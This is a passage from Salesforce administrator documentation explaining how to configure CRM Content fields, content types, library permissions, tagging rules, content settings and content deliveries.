receives a higher priority than similar content in search results, and appears on the Libraries tab for easy access. To feature
content, users must have the Feature Content option checked in their library permission.

• If your organization uses Google Docs, encourage library members to add their Google docs to a library. Including Google
docs in Salesforce CRM Content allows users to access all types of content from a single location and apply Salesforce
CRM Content functionality, such as votes, comments, and subscriptions, to Google docs.

See Also:
Customizing Salesforce CRM Content
Setting up Content Deliveries
Setting Up Salesforce CRM Content for Salesforce Classic
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CONTENT CUSTOMIZATION

Customizing Salesforce CRM Content
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Content Properties”

OR

“Manage Salesforce CRM Content”

To create, edit, or delete content fields:

“Customize Application”To define or change field validation rules:

“Manage Content Types”

OR

“Manage Salesforce CRM Content“

To create, edit, or delete content types:

“Manage Content Permissions”

OR

“Manage Salesforce CRM Content”

To create, edit, or delete library permissions:

“Manage Salesforce CRM Content”Modify content settings:

From Setup, click Customize > Salesforce CRM Content to access the following options for customizing Salesforce CRM
Content:

Tip:  To perform the initial set up of Salesforce CRM Content for your organization, see Setting Up Salesforce CRM
Content on page 2500.

• Content Fields—Create, edit, or delete custom content fields. Custom fields allow users to categorize and define content
during the publishing process.

• Validation Rules—Create, edit, or delete validation rules. Validation rules verify that the data a user enters when publishing
content meets the standards you specify before the user can save the content.

• Content Types—Create, edit, or delete the content type where content fields are assigned. The content type determines
the layout of fields in Salesforce CRM Content.

• Library Permissions—Create, edit, or delete library permissions. A library permission determines user privileges within
a library.
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• Settings—Modify Salesforce CRM Content default settings for multi-language support, PDF downloads, content pack
creation, or the enhanced document viewer.

See Also:
Setting Up Salesforce CRM Content

Customizing Content Fields
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Salesforce CRM Content”

OR

“Manage Content Properties”

To create, edit, or delete custom fields:

From Setup, click Customize > Salesforce CRM Content > Fields to create, modify, and delete Salesforce CRM Content
custom fields for categorizing and defining your content. The data assigned to these fields during upload is available on the
content details page for the life of the file. After creating custom content fields, you must assign them to a content type. The
content type determines which fields appear when a user uploads or revises files in Salesforce CRM Content. For more
information, see Setting Content Types on page 2505.

To create a custom content field:

1. Click New in the Custom Fields & Relationships related list.
2. Choose the type of field to create, and click Next.
3. For relationship fields, associate an object with the field and click Next.
4. Enter a field label. The field name is automatically populated based on the field label you enter. This name can contain

only underscores and alphanumeric characters, and must be unique in your organization. It must begin with a letter, not
include spaces, not end with an underscore, and not contain two consecutive underscores. Ensure the custom field name
is not identical to any standard field name for that object.

5. Choose the content type that should display the field as an editable field.

Click Edit or Del in the Content Custom Fields & Relationships related list to edit or delete a custom content field. You
cannot edit or delete the standard content fields. Deleted custom fields and their data are stored until your organization
permanently deletes them or 15 days has elapsed, whichever happens first. Until that time, you can restore the field and its
data.

See Also:
Customizing Salesforce CRM Content
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CONTENT TYPES

Setting Content Types
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Content Types”

OR

“Manage Salesforce CRM Content”

To create, edit, or delete content types:

Content types are the containers for custom fields in Salesforce CRM Content; content types determine which fields are
available during the publishing process and how the fields display on the content details page. If multiple content types are
available in a library, users select a content type after contributing files, content packs, Google docs, or Web links.

To work with content types, from Setup, click Customize > Salesforce CRM Content > Content Types. You can:

• Click New to create content types; see Creating Content Types on page 2506.

• Click Edit to edit content types; see Editing Content Types on page 2507.

• Click Del to delete a content type.

• Click picklists to modify the picklists on any content type. Picklists are customized selection lists that allow users to pick
values from a predefined list of entries.

When editing a library, you can choose which content types are visible to library contributors. For more information, see
Restricting Content Types on page 2508.

See Also:
Customizing Salesforce CRM Content
Customizing Content Picklists
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Creating Content Types
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Content Types”

OR

“Manage Salesforce Content”

To create content types:

Content types are the containers for custom fields in Salesforce CRM Content; content types determine which fields are
available during the publishing process and how the fields display on the content details page. If multiple content types are
available in a library, users select a content type after contributing files, content packs, Google docs, or Web links.

To create a new content type:

1. From Setup, click Customize > Salesforce Content > Content Types.
2. Click the New button, and then optionally choose a content type to copy.

Alternatively, select an existing content type from the list of content types, and then click the Clone button.

3. Enter a name for the new content type.
4. Click Save.

For instructions on modifying the content type, see Editing Content Types on page 2507.

Note: When editing a library, you can choose which content types are visible to library contributors. For more
information, see Restricting Content Types on page 2508.

See Also:
Setting Content Types
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Editing Content Types
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Content Types”

OR

“Manage Salesforce Content”

To edit content types:

Content types control the organization and visibility of fields on Salesforce CRM Content upload and detail pages.

To edit a content type:

1. From Setup, click Customize > Salesforce CRM Content > Content Types.
2. Identify the content type you want to modify and click Edit.
3. To arrange fields on the content type, select one or more fields from the box on the right and drag them to the desired

location.

• Use CTRL+click to select multiple items individually.
• Use SHIFT+click to select multiple items as a group.
• Items that are not in the content type are displayed in the scrolling box on the right-hand side.

Note:  Use the legend to determine what fields are required, dependent, controlling, or have other attributes that
may affect your content type decisions.

4. To make a field required, double-click the field name in the box on the left and click the Required checkbox.

Note:  Even though the Read Only option appears, Salesforce CRM Content fields cannot be read only.

5. Click Save to finish. Alternatively, click Quick Save to save and continue editing the content type.

See Also:
Setting Content Types
Creating Content Types
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Restricting Content Types
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Content Types”

OR

“Manage Salesforce CRM Content”

To restrict content types:

Content types are the containers for custom fields in Salesforce CRM Content; content types determine which fields are
available during the publishing process and how the fields display on the content details page. If multiple content types are
available in a library, users select a content type after contributing files, content packs, Google docs, or Web links. Administrators
can create content types in Setup and then choose which content types are available in a particular library. Administrators can
also choose the default content type for a library.

To restrict the content types available in a library:

1. On the Libraries tab, select a library from the My Libraries area.
2. Click Content Types.
3. Optionally, change the default content type for the library.
4. Select the Restrict the content types available in the library checkbox.
5. Select one or both of the following options:

• Allow content with any content type to be linked to this library—Select this option if you
want to enable content published in other libraries to be shared to the library where you have restricted content types.
The content in other libraries can be shared regardless of the content types used.

• Do not apply content type restrictions to existing content—Select this option if you do not want
to receive warnings regarding existing content in the library. You will not be alerted if existing content uses content
types that you exclude from the library. This option refers to notifications only; existing content is not affected by
restricted content types.

6. For each content type that you want to allow in the library, move it from the Available Content Types list to the Selected
Content Types list.

7. Click Save.

Notes on Restricting Content Types

• If the library already contains published content, selecting the Restrict the content types available in the
library option automatically moves all the content types used by the published content to the Selected Content Types
list.

• Deselecting the Restrict the content types available in the library option automatically moves any
content types in the Selected Content Types list to the Available Content Types list.

• If you restrict content types, the default content type must be added to the Selected Content Types list.
• When changing a file's managing library, the file's content type must be permitted in the new managing library.
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• When sharing a file into a library, the file's content type must be permitted in the shared library unless the Allow content
with any content type to be linked to this library option is selected for the shared library.

See Also:
Setting Content Types

Customizing Content Picklists
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create or change picklists:

Content types are the containers for custom fields in Salesforce CRM Content; content types determine which fields are
available during the publishing process and how the fields display on the content details page. A picklist is a customized
selection list that allows users to pick values from a predefined list of entries. To modify the picklists available on content types:

1. From Setup, click Customize > Salesforce CRM Content > Content Types and click the picklists link.
2. Select a content type and click Edit next to one of the picklist fields to customize the values included for the content type.
3. Add any values from the Available Values box or remove any values from the Selected Values box. Users will be able to

choose from the list of selected values when publishing content or editing content details.
4. Optionally, choose a default picklist value. Some picklists require a default value. The default value in a dependent picklist

is ignored.
5. Click Save.

Note:  The master picklist, the complete list of values in a picklist, is independent of all content types. If you add a
picklist value to the master picklist, you must manually include the new value in the appropriate content types. If you
remove a picklist value from the master, it is no longer available when publishing new content; however, existing
content assigned to that value is unchanged.

See Also:
Setting Content Types
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LIBRARIES

Creating Libraries
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Salesforce CRM Content”

OR

“Create Libraries”

To create libraries:

“Manage Salesforce CRM Content”

OR

Manage Library checked in your library permission
definition

To add members to a library:

“Manage Salesforce CRM Content”

OR

Manage Library checked in your library permission
definition

To assign library permissions to members:

Adding a new library in Salesforce CRM Content includes creating the library name and description, adding members to the
library, and assigning library permissions that determine each member's privileges within the library. The maximum number
of libraries allowed in a single organization is 2,000.

Step 1: Creating a New Library

1. Click New in the My Libraries section of the Libraries tab home page.
2. Enter a name for the library. Each library in your organization must have a unique name.
3. Optionally, enter a description for the library.
4. Click the Save and Add Members button or, if you want to add members later, click the Save and Close button.

Step 2: Adding Library Members

1. If you do not immediately see the member you want to add, enter keywords in the search box and click Find.
2. Select members from the Available Members box. Members can include individual Salesforce CRM Content users or

public groups containing Salesforce CRM Content users.

Tip:  If you have a large number of Salesforce CRM Content users, create a public group and add the group to a
library rather than adding users to the library individually.
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3. Click Add to add the members to the library.
4. Click Next.

Step 3: Assigning Library Permissions to Members

Select a library permission for each user or public group and click Save. For more information, see Managing Library Permissions
on page 2511.

See Also:
Customizing Salesforce CRM Content
Editing Library Permissions
Assigning Library Tagging Rules

Managing Library Permissions
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Salesforce CRM Content”

OR

“Manage Content Permissions”

To create, edit, or delete library permissions:

From Setup, click Customize > Salesforce CRM Content > Content Permissions to manage library permissions. A library
permission is a group of privileges assigned to each Salesforce CRM Content library member. It determines which tasks a
member can perform in a particular library. The same user can have a different library permission in each of his or her libraries.

Note:  If your Salesforce CRM Content organization was created after the Spring '09 release, your organization
already has three library permissions: Library Administrator, Author, and Viewer.

To create a custom library permission, click the Add Library Permissions button. To edit a library permission, click Edit next
to the library permission name. To delete a library permission, click Del next to the library permission name.

Note:  Library permissions do not apply to personal libraries. All Salesforce CRM Content users can save files in
their personal libraries.

See Also:
Creating Libraries
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Creating Library Permissions
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Salesforce CRM Content”

OR

“Manage Content Permissions”

To create library permissions:

To create a library permission in Salesforce CRM Content, click Customize > Salesforce CRM Content > Content Permissions
and click Add Library Permissions.

Tip:  If your Salesforce CRM Content organization was created after the Spring '09 release, your organization already
has Viewer, Author, and Library Administrator library permissions. If not, consider creating them. These three library
permissions provide the different levels of library access required for most organizations. For the “Viewer” library
permission, select the View Comments and Add Comments library privileges. For the “Author” library permission,
select the Add Content, Add Content on Behalf of Others, Archive Content, Add Comment, and
Tag Content library privileges. For the “Library Administrator” permission, select the Manage Library privilege.

1. Assign a name to the library permission.
2. Optionally, enter a description of the library permission. If your organization has several library permissions, consider

describing each by its function or with a summary of its privileges. For example, for a “Marketing Reviewer” permission
you might include a description that reads, “Reviews all content used in outbound marketing campaigns” or “This user can
view and comment on documents.”

3. In the Permissions section, select the checkboxes that correspond to the privileges you want to grant to users with this
library permission.

DescriptionLibrary Privilege

Perform any action in the library. This privilege is required
to edit the libraries' name and description, add or remove
library members, or delete a library.

Creating a new library requires the “Manage Salesforce CRM
Content” or “Create Libraries” user permissions.

Manage Library

Publish new content to the library, upload new content
versions, or restore archived (deleted) content. Content

Add Content

authors can also change any tags associated with their content
and archive or delete their own content.

Choose an author when publishing content in the library.Add Content on Behalf of Others

Archive and restore any content in the library.Archive Content
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DescriptionLibrary Privilege

Delete any content in the library. Authors can undelete their
own content from the Recycle Bin.

Delete Content

Identify any content in the library as “featured.”Feature Content

Read comments posted to any content in the library.View Comments

Post comments to any content in the library and view all
comments in the library. Users can edit or delete their own
comments.

Add Comments

Edit or delete comments made to any content in the library.Modify Comments

Add tags when publishing content or editing content details
in the library.

Tag Content

Create a content delivery using any files in the library.Deliver Content

Make content from this library accessible in Chatter. Within
Chatter, select a file from the library and attach it to a post
or share it.

Attach or Share Content within Chatter

4. Click Save.

See Also:
Creating Libraries
Managing Library Permissions
Editing Library Permissions

Editing Library Permissions
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Salesforce CRM Content”

OR

“Manage Content Permissions”

To edit library permissions:

To edit a Salesforce CRM Content library permission, click Customize > Salesforce CRM Content > Content Permissions
and click Edit next to the appropriate permission.

1. Assign a name to the library permission.
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2. Optionally, enter a description of the library permission. If your organization has several library permissions, consider
describing each by its function or with a summary of its privileges. For example, for a “Marketing Reviewer” permission
you might include a description that reads, “Reviews all content used in outbound marketing campaigns” or “This user can
view and comment on documents.”

3. In the Permissions section, select the checkboxes that correspond to the privileges you want to grant to users with this
library permission.

DescriptionLibrary Privilege

Perform any action in the library. This privilege is required
to edit the libraries' name and description, add or remove
library members, or delete a library.

Creating a new library requires the “Manage Salesforce CRM
Content” or “Create Libraries” user permissions.

Manage Library

Publish new content to the library, upload new content
versions, or restore archived (deleted) content. Content

Add Content

authors can also change any tags associated with their content
and archive or delete their own content.

Choose an author when publishing content in the library.Add Content on Behalf of Others

Archive and restore any content in the library.Archive Content

Delete any content in the library. Authors can undelete their
own content from the Recycle Bin.

Delete Content

Identify any content in the library as “featured.”Feature Content

Read comments posted to any content in the library.View Comments

Post comments to any content in the library and view all
comments in the library. Users can edit or delete their own
comments.

Add Comments

Edit or delete comments made to any content in the library.Modify Comments

Add tags when publishing content or editing content details
in the library.

Tag Content

Create a content delivery using any files in the library.Deliver Content

Make content from this library accessible in Chatter. Within
Chatter, select a file from the library and attach it to a post
or share it.

Attach or Share Content within Chatter

4. Click Save.

See Also:
Creating Libraries
Managing Library Permissions
Deleting Library Permissions

2514

Editing Library PermissionsSalesforce CRM Content



Deleting Library Permissions
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Salesforce CRM Content”

OR

“Manage Content Permissions”

To delete library permissions:

To delete a customized library permission for Salesforce CRM Content:

1. Click Customize > Salesforce CRM Content > Content Permissions.
2. Click Del next to the appropriate permission.
3. Review the list of affected users. The delete page shows all Salesforce CRM Content users who are assigned to the library

permission in a particular library. If you delete the library permission, the user will lose access to that library.
4. Click Delete Permission to confirm.

See Also:
Creating Libraries

Assigning Library Tagging Rules
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Salesforce CRM Content”

OR

Manage Libraries checked in your library permission
definition

To assign a tagging rule to a library:

In Salesforce CRM Content, tags are descriptive labels that help classify and organize content. Contributors can assign tags
to their files, content packs, Google docs, or Web links, thus enabling all library members to browse for content by tag. The
tagging rule in a library determines how contributors can tag content; for example, the restricted-tagging rule does not allow
contributors to create new tags. Library tagging rules are optional. By default, library contributors can enter any tag.

To assign a tagging rule to a library:

1. On the Libraries tab, select a library from the My Libraries area.
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2. Click Tagging Rules and choose one of the following options:

DescriptionLibrary Tagging Rule

This rule places no restrictions on tagging. Contributors can
enter any tag when publishing or editing content. While a

Open Tagging

tag is typed, Salesforce CRM Content autosuggests tags
based on the contributor's recently used tags and the Popular
Tags list.

This rule also enables contributors to enter any tag when
publishing or editing content, but contributors are also

Guided Tagging

offered a list of suggested tags. If you select Guided Tagging,
the next step prompts you to enter the suggested tags that
you want to recommend to library contributors.

This rule requires contributors to choose from the list of
suggested tags. If you select Restricted Tagging, the next
step prompts you to enter the list of suggested tags.

Restricted Tagging

3. If you chose Guided Tagging or Restricted Tagging, click the link for auto-populating the Suggested Tags field and
then edit, add, or remove tags as needed. If you do not auto-populate the Suggested Tags field, any new tags you enter
in the field are added to the existing list of suggested tags in the library.

4. Click Save.

Notes on Library Tagging Rules

• Open Tagging is the default tagging rule.
• If you publish, share, or move content to a library that uses restricted tags, you will receive an error if your content contains

unsupported tags.
• When you share content from one library to another, the most restrictive tagging rule applies. For example:

◊ When content is shared between a restricted-tagging library and a guided- or restricted-tagging library, you can only
choose tags that are common to both libraries.

◊ When content is shared between an open tagging library and a restricted-tagging library, you can only choose tags
suggested in the restricted-tagging library.

• If a restricted tagging rule is applied after content has already been published in the library and the existing content contains
tags that are no longer permitted by the rule, the tags remain assigned to the content until it is edited or revised. For
example, if the Q3Forecast document has a market indicators tag and market indicators is not a suggested
tag according to the new restricted-tagging rule, market indicators is removed from Q3Forecast only when a user
publishes a new version of the file or edits the file's tags on the content details page.

• Avoid using too many tags. The search engine helps users find specific content, whereas tags enable users to browse and
subscribe. Therefore, excessive tagging creates unnecessary clutter.

• You can't change or delete tag names. You can remove tags from a document, but that doesn't delete the tag.
• Tags are case insensitive. You can't have two tags with the same name even if they use different upper and lowercase letters.

The case of the original tag is always used.

See Also:
Creating Libraries
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CONTENT SETTINGS

Customizing Content Settings
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Salesforce CRM Content”To modify Salesforce CRM Content settings:

From Setup, click Customize > Salesforce CRM Content > Settings to modify the defaults for your Salesforce CRM Content
organization:

Enable Salesforce CRM Content

If this option is checked, Salesforce CRM Content is enabled for your organization.

Autoassign feature licenses to existing and new users

If this option is checked, Salesforce.com automatically attempts to assign Salesforce CRM Content feature licenses to
all existing users. If there aren't enough licenses available, no licenses are assigned. Contact salesforce.com to request
additional feature licenses. When a new user is created, a Salesforce CRM Content feature license is automatically
assigned as long as licenses are available. A feature license corresponds to the Salesforce CRM Content User
checkbox on the user detail page.

Enable multilanguage search and contribute

If this option is checked, a Language drop-down list is available when users publish, edit, or search for content. The
Language drop-down list contains all languages that Salesforce supports.

If a user does not choose a language when publishing content, that content is associated with the user's personal language
by default. If the user's personal language setting is different from the organization's language, content published by that
user is associated with the user's language, not the organization's language.

Do not open PDFs in a separate window

If this option is checked, downloaded PDFs open inline. If it is not checked, downloaded PDFs open in a separate
window. To download a PDF file:
• Open the document's content details page and click Download.

• On the Content tab, hover over the PDF icon and click Download in the popup window.

• On the Content tab, select the PDF's checkbox and click Download.

Enable content pack creation

If this option is checked, the Create New > Content Pack option displays on the Libraries tab and users can create
content packs from any documents or files in their Salesforce CRM Content private or public libraries.
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If this option is not checked after users in your organization have already created content packs, those packs are not
deleted and users can continue to modify metadata such as description, title, and custom fields. However, once content
pack creation is no longer enabled, users cannot customize or modify existing packs. Specifically, the Clone & Customize
button and the Edit > Edit Content Pack option on the content details page are unavailable.

Enable enhanced document viewer

If this option is checked, an enhanced set of navigation and customization options are available for the document viewer.
The document viewer allows users to preview a document without downloading, whether the document be a content
delivery sent to a lead, prospect, or colleague, a document viewed internally in Salesforce CRM Content, or a file in
Chatter. The document viewer has three modes: the Preview tab on the content details page (preview mode), the content
delivery URL (delivery mode), and full screen mode, which displays when you click the full-screen option on the content
details page or in a content delivery. In Chatter, users can preview files in feeds, on file lists, and on the Files tab. The
Enhanced document viewer setting provides the following capabilities to users who are viewing documents:
• In addition to using the next page ( ), previous page ( ), first page ( ), and last page ( ) icons on the document

toolbar, you can navigate page-by-page through a document by right-clicking and choosing Next Page and Previous
Page. The right-click menu is not available in preview mode.

• You can jump directly to a page by entering the page number and clicking Enter. This option is not available in
full-screen mode.

• From the right-click menu you can choose the Fit Width option to expand the width of the document or the Fit

Full Page option to view the whole page of the document. The fit width icon ( ) and fit full page icon ( ) are
also available on the toolbar.

• From the right-click menu you can choose the Full Screen option to view the document in full screen mode or the

Exit option to exit full screen mode. The full screen icon ( ) and exit icon ( ) are also available on the toolbar.
• From the right-click menu you can Zoom In or Zoom Out. The zoom-in icon ( ) and zoom-out icon ( ) are

also available on the toolbar.
• You can use the scroll bar to move continuously through a document without needing to click the Next Page and

Previous Page icons. Continuous scrolling is not available in preview mode or for PowerPoint documents in any
mode.

• You can use the keyboard arrow keys to navigate page-by-page through a document. Click on the document viewer
and use the keys as follows:

◊ Right-arrow key: moves a PowerPoint document forward one slide and moves a PDF, Word, or Excel document
forward one page.

◊ Left-arrow key: moves a PowerPoint document backward one slide and moves a PDF, Word, or Excel document
backward one page.

◊ Up-arrow key: moves a PowerPoint document forward one slide and scrolls a PDF, Word, or Excel document
up the page.

◊ Down-arrow key: moves a PowerPoint document backward one slide and scrolls a PDF, Word, or Excel document
down the page.

Navigating with keyboard-arrow keys is not available in preview mode.

Enable Office 2007 previews in Content—Pilot

If this option is checked, Microsoft Office 2007 files, including PowerPoint, Word, and Excel can be previewed in their
entirety in Salesforce CRM Content and Chatter. In Salesforce CRM Content you do not need to download a large
document to determine if its content is relevant to you. The content details page provides document details at a glance,
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including document title, author, description, tags, libraries, comments, votes, versions, subscribers, and downloads. If
the document is a Microsoft PowerPoint, Word, Excel, or Adobe® PDF file, you can preview the entire file in your
browser without downloading it. Some Microsoft Office 2007 features don't display correctly in previews. Copy-protected
PDFs can't be previewed.

You can also preview files in Chatter feeds, from the Files tab, from a file detail page, and from group and profile file
lists.

Note:  If this option is unchecked after Office 2007 previews have been generated, those previews will no longer
be available.

Show Chatter files in Salesforce CRM Content

If this option is checked, searches in Salesforce CRM Content include files from Chatter. The search drop-down list
on the Content and Libraries tabs, and the filters on the Content tab include All Files, Chatter Files, and My Chatter
Groups.

If this option is not checked, searches in Salesforce CRM Content don't include files from Chatter. The search drop-down
list on the Content and Libraries tabs, and the filters on the Content tab include All Libraries, Personal Library, and
any shared libraries the user is a member of.

See Also:
Customizing Salesforce CRM Content
Allowing Content Previews in Link Posts

Allowing Content Previews in Link Posts
Posts that contain rich media links are converted into embedded videos, images, and rich article previews.

Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, Developer, and Database.com Editions

Salesforce CRM, Approvals, Chatter email notifications, Chatter Invitations, and customer invitations are not available in
Database.com.

User Permissions Needed

“Customize Application”To enable Chatter:

You must enable Chatter before you can enable link previews.

The rich media content is provided by Embed.ly, a third-party service. We don’t share any content, user, organization, or
account data with Embed.ly. We only share the URLs that are on the domain whitelist. Additionally all of our URL requests
pass through a Salesforce proxy, meaning Embed.ly never receives calls directly from the client and therefore doesn’t have
information about who's making the URL request.

1. From Setup, click Customize > Chatter > Settings.
2. Click Edit.
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3. Select Allow Rich Link Previews.
4. Click Save.

Post with links to rich media content are rendered as a preview, including thumbnails, descriptions and video players for video
URLs. If a post doesn’t render a link as a rich preview in the feed, the URL domain for that link either isn’t supported or
Embed.ly was unable to return the preview content for the URL.

Rich media previews are enabled by default. If you disable rich media previews, users can only preview videos from the YouTube
community.

See Also:
Customizing Content Settings

CONTENT DELIVERIES

Setting up Content Deliveries
Available in: All Editions except Database.com

User Permissions Needed

“Customize Application”To enable or disable content deliveries:

A content delivery allows you to easily convert documents such as Microsoft® PowerPoint and Word files into an optimized
web-based version for easy online viewing. Once you create your delivery, you can send its encrypted URL to any recipient,
such as leads, customers, partners, and colleagues, and then track how often the content is viewed or downloaded. In addition
to tracking, content deliveries provide several benefits over sending files as attachments, such as giving you control over how
long the delivery is available to viewers and whether a viewer can download a file or see it online only. Content deliveries can
be created from the Content Deliveries related list on most Salesforce objects. Salesforce CRM Content users can also create
a content delivery from the content details page or the Related Content related list.

To enable or disable content deliveries for your organization:

1. From Setup, click Customize > Content Deliveries > Settings and select or deselect the Enable content deliveries
checkbox. If you don’t have access to the Content Delivery feature, contact Salesforce Customer Support to activate it.

2. To let users create and share links to Chatter files, click Enable Chatter file links.
3. To let recipients of content deliveries preview Office 2007 files:

a. From Setup, click Customize > Salesforce CRM Content > Settings.
b. Click Enable Office 2007 previews in content.
c. From Setup, click Customize > Content Deliveries > Settings.
d. Click Enable recipients to preview Office 2007 content deliveries.

Some Microsoft Office 2007 features don't display correctly in previews.
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4. Choose a default option for content-delivery passwords. Because content-delivery URLs can be sent to leads, customers,
or any unauthenticated user, salesforce.com, inc. recommends requiring password protection if your users will send
confidential documents via content delivery. The options below allow you to select an organization-wide default for
content-delivery password protection.

• Password protection is optional and defaults to OFF—If this option is selected, users can choose to require a password
when they create a content delivery, but the Require Password to Access Content field on the create-delivery
wizard is not checked by default.

• Password protection is optional and defaults to ON—If this option is selected, the Require Password to Access
Content field on the create delivery wizard is checked by default. Users can uncheck the option if they do not want
to require a password.

• Password protection is required—If this option is selected, a password is generated each time a content delivery is
created. Users cannot opt out of the password requirement.

Note:

• If you choose to require a password, users who create a content delivery will receive a password when the
delivery is generated; users must send the password and the delivery URL to delivery recipients. Delivery
recipients are prompted for the password when they click the content delivery URL.

• Content delivery passwords display with the content-delivery URL when the delivery is created. You can also
access the password on the delivery detail page for the life of the content delivery.

When content delivery is enabled, all users should add the Content Deliveries related list to their page layouts for leads, business
accounts, contacts, opportunities, cases, campaigns, or custom objects. All Salesforce CRM Content users will see a Deliver
Content option on each content details page.

Implementation Tips

• To ensure quality of service, the total number of content-delivery views allowed within a 24-hour period is limited to
20,000. Also, the amount of bandwidth allocated to content deliveries is limited to 1 GB within a 24-hour period. If a
recipient tries to view a delivery when a rate limit has been exceeded, a notification displays that asks the viewer to try again
later. Salesforce may be able to increase rate limits on an exception basis. For more information, contact your sales
representative.

• When you create a content delivery, Salesforce copies the original file and creates a new version of that file specifically for
online viewing. Note the following information concerning supported file types:

◊ Microsoft® Office 97 through Microsoft Office 2007 Word, Excel, and PowerPoint files are supported for online views.
◊ Adobe® PDF files are supported for online views, but copy-protected PDFs are not.
◊ JPG, BMP, GIF, and PNG are supported for online views.
◊ Any document over 25 MB is not supported for online views.

You can create a content delivery with any file type, but if the file type is not supported for online viewing, your recipient
can only download the document in its original file format.

• Always preview your content delivery before sending the URL to recipients. In some cases, formatting in the original file,
such as colors and non-standard fonts, may not display properly in the online version. If you are not happy with the quality
of the online version, the content delivery wizard gives you the option of making your content available for download in
its original file format.

• Content deliveries require Adobe Flash version 9.0.115. If a recipient does not have Flash installed, a download option
displays.

• Customer Portal and partner portal users cannot create content deliveries.
• Only the creator of a content delivery can delete the delivery record or edit details such as the expiration date.
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• Each time a content delivery's URL is clicked, Salesforce records the click as one view and distinguishes between internal
and external views. An internal view is a view by a Salesforce user, for example, clicking the delivery URL on the delivery
detail page or the View option on the Content Deliveries related list is an internal view. The Content Deliveries related
list provides a count of all views for each delivery. Open the delivery details page to see information about a specific view.

Note:  For password-protected content deliveries, a view is recorded when the recipient clicks on the delivery
URL regardless of whether he or she enters the password and views the delivery.

• To delete a Salesforce CRM Content file that is associated with a content delivery, first delete the content delivery.
• Salesforce CRM Content users can deliver content from shared libraries or a personal library.

Best Practices

• After creating a content delivery, always preview it before sending the URL to your recipients to ensure that the formatting
in the original file displays properly in the online version. For example, colors and non-standard fonts may not display
properly in the preview player. If you are not happy with the quality of the online version, click Previous and choose to
make your content available in its original file format or as a PDF file only. Your recipients will be able to download the
file, and you can track whether the file was downloaded on the delivery detail page.

• Animation and timings in PowerPoint files are not supported in the content delivery's online version. Hyperlinks in all
file types are also unsupported. See the implementation tips for a complete list of supported file types.

• If you are a Salesforce CRM Content user and want recipients of your content delivery to always see the latest version of
a file rather than the version available on the delivery-creation date, open the delivery detail page and click Edit. Select
the Content Delivery Opens Latest Version checkbox.

• If you select Notify Me of First View or Download, you will receive an email when the content delivery is viewed
for the first time.

Storage Implications

In Salesforce CRM Content, file storage is consumed when content is published to shared libraries or saved to a private library.
Creating content deliveries does not have an additional affect on storage limits, but users who frequently upload files to their
personal libraries for the purpose of content delivery should consider their organization's file-storage limits. Administrators
can use reporting to identify which users are consuming the most storage and which files are largest in size.

For non-Salesforce CRM Content users, file storage is consumed each time a content delivery is created. Once uploaded to
Salesforce, a file cannot be reused for multiple content deliveries. Creating multiple content deliveries with the same file
requires uploading the file each time. Deleting a content delivery deletes the source file in Salesforce, thus increasing file-storage
space.

See Also:
Setting Up Salesforce CRM Content
Content Delivery Fields
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Content Delivery Fields
Available in: All Editions except Database.com

Salesforce CRM Content available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer
Editions

The following table provides a description of the fields (in alphabetical order) that make up a content delivery. These fields
are located on the create-delivery wizard, the Content Deliveries related list, or the delivery details page.

DescriptionField

If checked, the content delivery can be viewed online in a
custom Web page. On the delivery details page, this field is
labeled Allow View in the Browser.

Allow Recipient to View in the Browser

If checked, the content delivery converts Microsoft® Word,
Excel, and PowerPoint files into PDF files and gives the

Allow Recipient to Download as PDF

recipient the option of downloading the PDF. If the file you
uploaded was not a PDF, Word, Excel, or PowerPoint file,
this option does not appear in the create-delivery wizard. On
the delivery details page, this field is labeled Allow
Download as PDF.

If checked, the content delivery allows recipients to download
the original file. In the create-delivery wizard, this field is

Allow Download in Original Format

called Allow Recipient to Download as [file

type] where [file type] is the original file's file type, such
as .ppt, .pdf, or .doc.

For Salesforce CRM Content files, the user who published
the file. (Read only)

Author

The name assigned to the content delivery. By default, the
Content Delivery Name includes the file name and the
creation date.

Content Delivery Name

For Salesforce CRM Content files, this flag indicates that the
recipient of a content delivery sees the most current version

Content Delivery Opens Latest Version

of a file. For example, if a file is updated between the
delivery-creation date and today's date, a recipient who views
the delivery today sees the newest version.

A flag that indicates whether access to the content delivery
will expire on the expiration date. In the create-delivery wizard,

Content Delivery Expires

this flag corresponds to the checkbox next to the Remove
access to content on field.

The user who created the content delivery, including creation
date and time. (Read only)

Created By
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DescriptionField

For Salesforce CRM Content files, the description provided
when the file was published. (Read only)

Description

The date on which the content delivery can no longer be
viewed. In the create-delivery wizard, this is the date entered
in the Remove Access to Content on field.

Expiration Date

A flag that indicates whether a file in the content delivery was
downloaded. For example, if a content delivery includes

File Downloaded

options to view the content in the browser, download the
content in its original file format, and download the content
as a PDF file, this flag is checked if the recipient downloads
the original file or the PDF file. (Read only)

A flag that indicates whether a Salesforce user viewed the
content delivery. A view is considered internal if the user opens

Internal View

the delivery URL from within Salesforce, for example by
clicking View on the Content Deliveries related list or clicking
the delivery URL on the delivery detail page. If the user copies
the URL and pastes it into his or her browser, the view is
considered external. (Read only)

The user who last modified the content delivery, including
modification date and time. (Read only)

Last Modified By

The date and time on which the content delivery was last
viewed. A view is one click of the content-delivery URL. (Read
only)

Last Viewed

